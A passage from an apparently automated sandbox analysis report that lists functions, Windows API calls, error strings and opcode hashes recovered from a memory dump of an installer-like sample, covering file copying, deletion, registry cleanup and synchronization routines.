                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2528220319-2757871984
                                                                                                                                                                                                                                                                                                  • Opcode ID: b43415dc7cda004005e1d63af4e42466f1cc423f72ca7987a45f095901054866
                                                                                                                                                                                                                                                                                                  • Instruction ID: 72b11f0a5b1d9275c2e5c26a5bae8ae144fd833c3471255a077cbbb2a1f8d986
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b43415dc7cda004005e1d63af4e42466f1cc423f72ca7987a45f095901054866
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C21B136580627B6DB321AEC8C4DBDB7E29BF40760F158313FD156639093219D61EAD2
                                                                                                                                                                                                                                                                                                  Function 005C71FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 005C7210
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format escape sequence., xrefs: 005C72AA
                                                                                                                                                                                                                                                                                                  • Failed to append characters., xrefs: 005C729C
                                                                                                                                                                                                                                                                                                  • [\%c], xrefs: 005C726F
                                                                                                                                                                                                                                                                                                  • Failed to append escape sequence., xrefs: 005C72A3
                                                                                                                                                                                                                                                                                                  • []{}, xrefs: 005C723A
                                                                                                                                                                                                                                                                                                  • Failed to allocate buffer for escaped string., xrefs: 005C7227
                                                                                                                                                                                                                                                                                                  • Failed to copy string., xrefs: 005C72C4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-3250950999
                                                                                                                                                                                                                                                                                                  • Opcode ID: 578ffc46a689c84dfbd6b78c21bb4f762eb020943b03ca97c30a2668c23cbc3c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 14d524d822c8ad74ccee63adb0825dde717e6ebd63783e90b86286e3f31a0a18
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 578ffc46a689c84dfbd6b78c21bb4f762eb020943b03ca97c30a2668c23cbc3c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D21E53694861EBEDB2556D08C06FAF7F6EBF18730F21015DF901B6180DB755E009A94
                                                                                                                                                                                                                                                                                                  Function 006041E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001), ref: 00604203
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000002,?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001,000007D0,00000001,00000001,00000003), ref: 00604212
                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001), ref: 006042A6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0060432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005DA063,00000001,000007D0,00000001), ref: 006042B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindFirstFileW.KERNEL32(005E923A,?,00000100,00000000,00000000), ref: 0060447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindClose.KERNEL32(00000000), ref: 00604487
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                                                                                                                                                  • String ID: \$fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3479031965-1689471480
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c2691e3bfe03d215e1b1f734e103d5c61a7cc55b82876386685e37c3ad52fe6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 88eb56e878f75cd9fda10f5073d54e5545384f8ac32649a5d18cad14ad590c5f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c2691e3bfe03d215e1b1f734e103d5c61a7cc55b82876386685e37c3ad52fe6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31D6B6BC12269BDB395E95CC40AAF7667FF51760B114039FE049B390DB708E41C6D0
                                                                                                                                                                                                                                                                                                  Function 005CF005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,005D0654,00000001,00000001,00000001,005D0654,00000000), ref: 005CF07D
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,005D0654,00000001,00000001,00000001,005D0654,00000000,00000001,00000000,?,005D0654,00000001), ref: 005CF09A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to remove update registration key: %ls, xrefs: 005CF0C7
                                                                                                                                                                                                                                                                                                  • PackageVersion, xrefs: 005CF05E
                                                                                                                                                                                                                                                                                                  • Failed to format key for update registration., xrefs: 005CF033
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                                                                                                                                                                                  • API String ID: 446873843-3222553582
                                                                                                                                                                                                                                                                                                  • Opcode ID: 79f90136251def85461c648bc75830506c65ddb09b3109c27fc90276b66875d8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 167f044c10f08920edbd6604df780c027cdd3ecfde8c74b3a0b20015132d7bbb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79f90136251def85461c648bc75830506c65ddb09b3109c27fc90276b66875d8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D221C535941129BFDB219BA5CC09FAFBFBAEF04B20F100279BD11B2191E7354A40D790
                                                                                                                                                                                                                                                                                                  Function 00604019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,005C4DBC,00000000,?,?,00000000,?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?), ref: 00604033
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00604041
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,005C4DBC,00000000,005C4DBC,00000000,?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?,00000001), ref: 006040AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0060412D,00000000,005C4DBC,00000000,00000000,?,005D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 006040B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CopyErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 374144340-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: e5d239e2e1691dabbe7a627893daab69d2d6761d957d98ff7402f70394d56384
                                                                                                                                                                                                                                                                                                  • Instruction ID: ab213596a065fdbbc692d20e0c1f32171a0fd5f8503538680bad0cb9f4d93999
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5d239e2e1691dabbe7a627893daab69d2d6761d957d98ff7402f70394d56384
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC2107F66C233697DB340B964C80BBB669AEF10B60B154135FF06FB691EF618C4082E4
                                                                                                                                                                                                                                                                                                  Function 005ED259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005ED2EE
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 005ED31C
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 005ED325
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 944053411-3611226795
                                                                                                                                                                                                                                                                                                  • Opcode ID: f93f9aaaf180f1b71b86f4fcbadbac0f0238642bcf70a0f05ffc23a66eb45705
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0acde3e69d868df02ce18cb49aea5a00535ed501b7916abfa101b5936636ed44
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f93f9aaaf180f1b71b86f4fcbadbac0f0238642bcf70a0f05ffc23a66eb45705
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5321B5B460074AFFDB149F68D844A59BBF6FF48320F10C669F964A7352C771AD508BA0
                                                                                                                                                                                                                                                                                                  Function 00604153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindFirstFileW.KERNEL32(005E923A,?,00000100,00000000,00000000), ref: 0060447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604440: FindClose.KERNEL32(00000000), ref: 00604487
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(005E923A,00000080,00000000,005E923A,000000FF,00000000,?,?,005E923A), ref: 00604182
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,005E923A), ref: 0060418C
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(005E923A,00000000,005E923A,000000FF,00000000,?,?,005E923A), ref: 006041AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,005E923A), ref: 006041B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3967264933-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e6fd62b030a4e2d02891193cbe69d6ea27a22b69b909a70bdf07db7c80727c9
                                                                                                                                                                                                                                                                                                  • Instruction ID: e46d4f137906518577d1d9f05934ec0ddf711109344c39558149a1b4cc3389a6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e6fd62b030a4e2d02891193cbe69d6ea27a22b69b909a70bdf07db7c80727c9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5101F9F2AC1636A7D7354AA5DC04BBB7E9AAF14760F014690FE44EA3D0DB218D9085D0
                                                                                                                                                                                                                                                                                                  Function 005C61DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2054405381-1522884404
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d881c842dae421357bab76988ce41f5e6c94e6f809c57452add3e3aca12b0a6
                                                                                                                                                                                                                                                                                                  • Instruction ID: ece4f7d6c93f68aa65b1f605e98e943c4ec0b5afc83d8abf2449f52968f5738f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d881c842dae421357bab76988ce41f5e6c94e6f809c57452add3e3aca12b0a6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F01F936A812296BD7249B95DC0AFAFBBA8BB00720F114259FC04E7281DB709E405AD5
                                                                                                                                                                                                                                                                                                  Function 005C21AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C21F2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C21FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: HeapSize.KERNEL32(00000000,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BE2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                                                                                                                                                  • Opcode ID: ef1201d7d80c5fcf1977262bacc0ccff2084881bc3470345d6d8fa01b5679ab5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ed3a77646ac8cfa76039a5c985d033a02ad75b1eba1870f9306c6dc3b4db63c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef1201d7d80c5fcf1977262bacc0ccff2084881bc3470345d6d8fa01b5679ab5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB31D33A64122AAFD7208EE5CC44F6B3E99BF55774F21422CFD15AB290EA71CC0096E0
                                                                                                                                                                                                                                                                                                  Function 005ED152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,005ED148,00000000), ref: 005ED16D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,005ED148,00000000), ref: 005ED179
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(0060B518,00000000,?,00000000,?,005ED148,00000000), ref: 005ED186
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,005ED148,00000000), ref: 005ED193
                                                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(0060B4E8,00000000,?,005ED148,00000000), ref: 005ED1A2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 31b2075f72b05219dbb2e0285a33f99ef70ac576dd6fb6c7544015db74d8efb7
                                                                                                                                                                                                                                                                                                  • Instruction ID: bb9d7c3ced2104788b26a99724a4bcbc1ae44c005be20fcbaddc80f5bc27f55e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31b2075f72b05219dbb2e0285a33f99ef70ac576dd6fb6c7544015db74d8efb7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F201D276440B5ADFCB35AFA6D88081AFBF9BE50711315D93EE1E652920C371A890CE60
                                                                                                                                                                                                                                                                                                  Function 005ED1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,005ED3EE,00000000,00000000,00000000,?), ref: 005ED1C3
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,005ED3EE,00000000,00000000,00000000,?), ref: 005ED24A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for message data, xrefs: 005ED212
                                                                                                                                                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 005ED208
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
